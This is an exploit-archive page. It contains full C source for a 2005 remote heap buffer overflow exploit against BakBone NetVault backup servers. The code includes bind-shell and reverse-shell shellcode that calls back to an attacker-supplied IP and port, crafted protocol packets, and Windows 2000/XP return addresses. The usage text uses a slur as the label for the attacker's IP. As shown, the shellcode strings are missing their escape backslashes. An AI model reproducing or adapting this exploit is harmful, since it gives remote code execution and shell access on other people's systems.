[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow Exploit (2)
# Published : 2005-04-01
# Author : class101
# Previous Title : Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow
# Next Title : Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit
/*
for more informations class101.org/netv-remhbof.pdf
*/
#include <stdio.h>
#include <string.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
char scode1[]=
"x33xC9x83xE9"
"xAFxD9xEExD9x74x24xF4x5Bx81x73x13xBB"
"x1ExD3x6Ax83xEBxFCxE2xF4x47x74x38x25x53xE7x2Cx95"
"x44x7Ex58x06x9Fx3Ax58x2Fx87x95xAFx6FxC3x1Fx3CxE1"
"xF4x06x58x35x9Bx1Fx38x89x8Bx57x58x5Ex30x1Fx3Dx5B"
"x7Bx87x7FxEEx7Bx6AxD4xABx71x13xD2xA8x50xEAxE8x3E"
"x9Fx36xA6x89x30x41xF7x6Bx50x78x58x66xF0x95x8Cx76"
"xBAxF5xD0x46x30x97xBFx4ExA7x7Fx10x5Bx7Bx7Ax58x2A"
"x8Bx95x93x66x30x6ExCFxC7x30x5ExDBx34xD3x90x9Dx64"
"x57x4Ex2CxBCx8AxC5xB5x39xDDx76xE0x58xD3x69xA0x58"
"xE4x4Ax2CxBAxD3xD5x3Ex96x80x4Ex2CxBCxE4x97x36x0C"
"x3AxF3xDBx68xEEx74xD1x95x6Bx76x0Ax63x4ExB3x84x95"
"x6Dx4Dx80x39xE8x4Dx90x39xF8x4Dx2CxBAxDDx76xD3x0F"
"xDDx4Dx5Ax8Bx2Ex76x77x70xCBxD9x84x95x6Dx74xC3x3B"
"xEExE1x03x02x1FxB3xFDx83xECxE1x05x39xEExE1x03x02"
"x5Ex57x55x23xECxE1x05x3AxEFx4Ax86x95x6Bx8DxBBx8D"
"xC2xD8xAAx3Dx44xC8x86x95x6Bx78xB9x0ExDDx76xB0x07"
"x32xFBxB9x3AxE2x37x1FxE3x5Cx74x97xE3x59x2Fx13x99"
"x11xE0x91x47x45x5CxFFxF9x36x64xEBxC1x10xB5xBBx18"
"x45xADxC5x95xCEx5Ax2CxBCxE0x49x81x3BxEAx4FxB9x6B"
"xEAx4Fx86x3Bx44xCExBBxC7x62x1Bx1Dx39x44xC8xB9x95"
"x44x29x2CxBAx30x49x2FxE9x7Fx7Ax2CxBCxE9xE1x03x02"
"x54xD0x33x0AxE8xE1x05x95x6Bx1ExD3x6A";
char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "x20"
original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"xFCx6AxEBx52" /*modded adjusting jump*/
"xE8xF9xFFxFFxFFx60x8Bx6Cx24x24x8Bx45x3Cx8Bx7Cx05"
"x78x01xEF"
"x83xC7x01" /*modded, adding 1 to edi*/
"x8Bx4Fx17" /*modded, adjusting ecx*/
"x8Bx5Fx1F" /*modded, adjusting ebx, "x20" out, yeahouu ;>*/
"x01xEBxE3x30x49x8Bx34x8Bx01xEEx31xC0x99xACx84xC0"
"x74x07xC1xCAx0Dx01xC2xEBxF4x3Bx54x24x28x75xE3"
"x8Bx5Fx23" /*modded, adjusting ebx*/
"x01xEBx66x8Bx0Cx4B"
"x8Bx5Fx1B" /*modded, adjusting ebx*/
"x01xEBx03x2Cx8Bx89x6Cx24x1Cx61xC3x31xC0x64x8Bx40"
"x30x8Bx40x0Cx8Bx70x1CxADx8Bx40x08x5Ex68x8Ex4Ex0E"
"xECx50xFFxD6x31xDBx66x53x66x68x33x32x68x77x73x32"
"x5Fx54xFFxD0x68xCBxEDxFCx3Bx50xFFxD6x5Fx89xE5x66"
"x81xEDx08x02x55x6Ax02xFFxD0x68xD9x09xF5xADx57xFF"
"xD6x53x53x53x53x43x53x43x53xFFxD0x68x00x00x00x00"
"x66x68x00x00x66x53x89xE1x95x68xECxF9xAAx60x57xFF"
"xD6x6Ax10x51x55xFFxD0x66x6Ax64x66x68x63x6Dx6Ax50"
"x59x29xCCx89xE7x6Ax44x89xE2x31xC0xF3xAAx95x89xFD"
"xFEx42x2DxFEx42x2Cx8Dx7Ax38xABxABxABx68x72xFExB3"
"x16xFFx75x28xFFxD6x5Bx57x52x51x51x51x6Ax01x51x51"
"x55x51xFFxD0x68xADxD9x05xCEx53xFFxD6x6AxFFxFFx37"
"xFFxD0x68xE7x79xC6x79xFFx75x04xFFxD6xFFx77xFCxFF"
"xD0x68xEFxCExE0x60x53xFFxD6xFFxD0";
char scodeA[] =
"x11x03x00x00x01xCBx22x77xC9x17x00x00x00x69x3Bx69"
"x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69"
"x3Bx73x3Bx00x00x00x00x00xC0x00x00x00x0Cx58x3Cx42"
"x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00"
"x03x00x00x00x03x00x00x00x00x00x00x00x02x00x00x00";
char scodeB[] =
"x00x51x02x00x00x00x00x00x00x01x03x05x27xCAx07x00"
"x00x00x73x3Bx62x3Bx6Fx3Bx00";
char scodeC[] =
"x00x00x02x01x00x00x00x8FxD0xF0xCAx0Bx00x00"
"x00x69x3Bx62x3Bx6Fx3Bx6Fx3Bx7Ax3Bx00x11x57x3Cx42"
"x00x01xB9xF9xA2xC8x00x00x00x00x03x00x00x00x00x01"
"xA5x97xF0xCAx05x00x00x00x6Ex33x32x3Bx00x20x00x00"
"x00x10x02x4Ex3FxACx14xCCx0Ax00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x01xA5x97xF0xCAx05x00x00x00x6Ex33x32x3Bx00x20"
"x00x00x00x10x02x4Ex3FxC0xA8xEAxEBx00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x01xA5x97xF0xCAx05x00x00x00x6Ex33x32x3B"
"x00x20x00x00x00x10x02x4Ex3FxC2x97x2CxD3x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00xB9xF9xA2xC8x02x02x00x00x00xA5x97"
"xF0xCAx05x00x00x00x6Ex33x32x3Bx00x20x00x00x00x04"
"x02x4Ex3FxACx14xCCx0AxB0xFCxE2x00x00x00x00x00xEC"
"xFAx8Ex01xA4x6Bx41x00xE4xFAx8Ex01xFFxFFxFFxFFx01"
"x02x00x00x00";
char scodeD[] =
"x00x06x00x00x00x0Bx00x00x00x05x00x00x00x54"
"x79x70x65x00x01x00x00x00x01x00x00x00x06x00x00x00"
"x77x69x6Ex6Ex74x00x12x00x00x00x55x44x50x20x46x72"
"x61x67x6Dx65x6Ex74x20x53x69x7Ax65x00x01x00x00x00"
"x01x00x00x00x05x00x00x00x31x34x30x30x00x07x00x00"
"x00x53x65x72x76x65x72x00x01x00x00x00x01x00x00x00"
"x05x00x00x00x54x52x55x45x00x0Cx00x00x00x44x65x73"
"x63x72x69x70x74x69x6Fx6Ex00x00x00x00x00x01x00x00"
"x00x0Ax00x00x00x4Ex56x56x65x72x73x69x6Fx6Ex00x01"
"x00x00x00x01x00x00x00x05x00x00x00x37x30x33x30x00"
"x0Dx00x00x00x4Ex56x42x75x69x6Cx64x4Cx65x76x65x6C"
"x00x01x00x00x00x01x00x00x00x03x00x00x00x33x37x00";
char grabcpname[] =
"xC9x00x00x00x01xCBx22x77xC9x17x00x00x00x69x3Bx69"
"x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69"
"x3Bx73x3Bx00x00x00x00x00xC0x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x08x00x00x00"
"x03x00x00x00x03x00x00x00x00x00x00x00x0Bx00x00x00"
"x90x90x90x90x90x90x90x90x90x90x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x09x00x00x00x00x00x00x00x00";
char payload[1024],payload2[20000000],recvbuf[1024],ver2[1024],cpname[1024],sz[1024],szb[1024],szb2[1024];
int tot,tot2,l00p=0;
char sip[3],spo[1],pad[]="xEBx0A",pad2[]="xE9xF3xFDxFFxFF";
char ret1[]="x7Ex6Dx03x75"; //call dword [esi+4C], ws2_32.dll, w2k SP4 EN
char ret1c[]="xBDx9Bx36x7C"; //call dword [edi+74], MSVCR71.dll, XP SP1a-1-0 EN
char ret2[]="xF0xA1x5Cx7C"; //UEF (UnHandledExceptionFilter) w2k sp4 EN
char ret4[]="xB4x73xEDx77"; //UEF XP SP1a-1-0 EN
char padA[]="x00x00x00";
char szc[]="xFFxFF";
// rtlmethod char repair[]="xC7x40x89x60x20xF8x77"; repairing RtlEnterCriticalSection on 2k SP4
//you will prolly need to repair this repair[] for your os :>
//I did it quickly: mov dword ptr [eax-77],77F82060
//for litchfield this method is reliable due to the fixed address 0x7FFDF020
//for me that's a crap method like others known heap exploitations
//because you realiably repair the functions across all nt based os?, and where to realiably jump...,
//and also the call to drwtsn32, right before ExitProcess(), acts as a breakpoint, and your shellcode will be executed
//once 'OK' or 'CANCEL' clicked. At least this is still a 'fun' ExitProcess() :)
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
void usage(char* us);
void sl(int time);
int main(int argc,char *argv[])
{
ver();
int check1, check2, rc, i, j, k;
unsigned long gip;
unsigned short gport;
char *what, *where, *os;
loop:
if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x00000000;
gport=htons(atoi(argv[5]))^(short)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...n");return -1;}
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup errorn");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x00000000;
gport=htons(atoi(argv[5]))^(USHORT)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...n");return -1;}
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=20031;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() errorn");return -1;}
if (atoi(argv[1]) == 1){what=ret1;where=ret2;os="Win2k SP4 Server Englishn[+] Win2k SP4 Pro Englishn";}
if (atoi(argv[1]) == 2){what=ret1c;where=ret4;os="WinXP SP0 Pro. Englishn[+] WinXP SP1 Pro. Englishn[+] WinXP SP1a Pro. Englishn";}
if (l00p==0){printf("[+] TARGET: %sn",os);sl(1);}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() errorn");closesocket(s);return -1;}
case 0: {printf("[+] connect() errorn");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
if (l00p==0)
{
printf("[+] connection 1: grabbing computername via netvault...n");
sl(2);
send(s,grabcpname,sizeof(grabcpname)-1,0);
rc = recv(s,recvbuf,sizeof(recvbuf),0);
if (rc==-1||rc<400||recvbuf[13]!=105&&recvbuf[14]!=59){printf("[+] not netvault or patched, aborting..n");return -1;}
else if (rc==0){printf("[+] nothing received, not netvault or patched, aborting..n");return -1;}
else printf("[+] analyzing packets, sorting computernamen");
sl(2);
printf("[+] bufsize: %dn",rc);sl(1);
for (i=80,j=0;recvbuf[i]!=0;i++,j++)
{
memset(cpname+j,recvbuf[i],1);
}
memset(sz,strlen(cpname)+1,1);
memset(ver2,recvbuf[rc-37],1);memset(ver2+1,0x2E,1);
memset(ver2+2,recvbuf[rc-35],1);memset(ver2+3,0x2E,1);
memset(ver2+4,recvbuf[rc-34],1);
printf("[+] cmpname: %sn",cpname);sl(1);
printf("[+] version: %sn",ver2);sl(1);l00p++;
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
goto loop;
}
printf("[+]n[+] connection 2: modding payload regarding computername and lengthn");sl(1);
printf("[+] loading attackn");sl(1);
/*the cpname length is important, that's why we reajust EAX and ECX
function of cpnamelength.*/
k=7-strlen(cpname);
memset(payload,0x41,1);
// rtlmethod memset(payload2,0x90,k+32417); rtl
// rtlmethod memcpy(payload2+k+32417,"x1CxF0xFDx7F",4);
// rtlmethod memcpy(payload2+k+32421,"x1Ax9ExEAx00",4);
// rtlmethod memcpy(payload2+k+31902, repair, 7);
memset(payload2,0x90,k+35431);
memcpy(payload2+k+32413,pad,2);memcpy(payload2+k+32417,what,4);memcpy(payload2+k+32421,where,4);memcpy(payload2+k+32426,pad2,5);
if (argc==6)
{
memcpy(&scode2[167], &gip, 4);
memcpy(&scode2[173], &gport, 2);
memcpy(payload2+k+31914,scode2,strlen(scode2));
}
else memcpy(payload2+k+31914,scode1,strlen(scode1));
tot=sizeof(padA)-1+sizeof(scodeA)-1+sizeof(scodeB)-1+sizeof(scodeC)-1+sizeof(scodeD)-1+strlen(payload)+strlen(payload2)+strlen(sz)+strlen(cpname);
tot2=tot-192;
memcpy(szb,&tot,2);memcpy(&scodeA[0],&szb,strlen(szb));
memcpy(szb2,&tot2,2);memcpy(&scodeB[1],&szb2,strlen(szb2));
memcpy(scodeC+254,szc,2);
printf("[+] sh0uting the heap!n");sl(3);
if (send(s,scodeA,sizeof(scodeA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,scodeB,sizeof(scodeB)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,sz,strlen(sz),0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,padA,sizeof(padA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,cpname,strlen(cpname),0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,scodeC,sizeof(scodeC)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,payload2,strlen(payload2),0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
sl(6);
printf("[+]n[+] size of payload: %dn",tot);
if (argc==6){printf("[+] payload sent, look at your listener, you should get a shelln");}
else printf("[+] payload sent, use telnet %s:101 to get a shelln",inet_ntoa(server.sin_addr));
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf(" n");
printf("[+] . 101_netvault.exe Target VulnIP (bind mode) n");
printf("[+] . 101_netvault.exe Target VulnIP VulnPORT (bind mode) n");
printf("[+] . 101_netvault.exe Target VulnIP VulnPORT GayIP GayPORT reverse mode) n");
printf("TARGETS: n");
printf("[+] 1. Win2k SP4 Server English (*) - v5.0.2195 n");
printf("[+] 1. Win2k SP4 Pro English (*) - v5.0.2195 n");
printf("[+] 2. WinXP SP0 Pro. English - v5.1.2600 n");
printf("[+] 2. WinXP SP1 Pro. English (*) - v5.1.2600 n");
printf("[+] 2. WinXP SP1a Pro. English (*) - v5.1.2600 n");
printf("NOTE: n");
printf("The exploit bind a cmdshell port 101 or n");
printf("reverse a cmdshell on your listener. n");
printf("A wildcard (*) mean tested working, else, supposed working. n");
printf("A symbol (-) mean all. n");
printf(" Compilation msvc6, cygwin, Linux. n");
printf(" n");
return;
}
void ver()
{
printf(" n");
printf("============================[v0.1]====n");
printf("=====BakBone NetVault, Backup Server===============n");
printf("=====Clientname, Remote Heap Overflow Exploit==========n");
printf("====coded by class101======[Hat-Squad.com 2005]=====n");
printf("============================================n");
printf(" n");
}
void sl(int time)
{
#ifdef WIN32
Sleep(time*1000);
#else
Sleep(time);
#endif
}
// www.Syue.com [2005-04-01]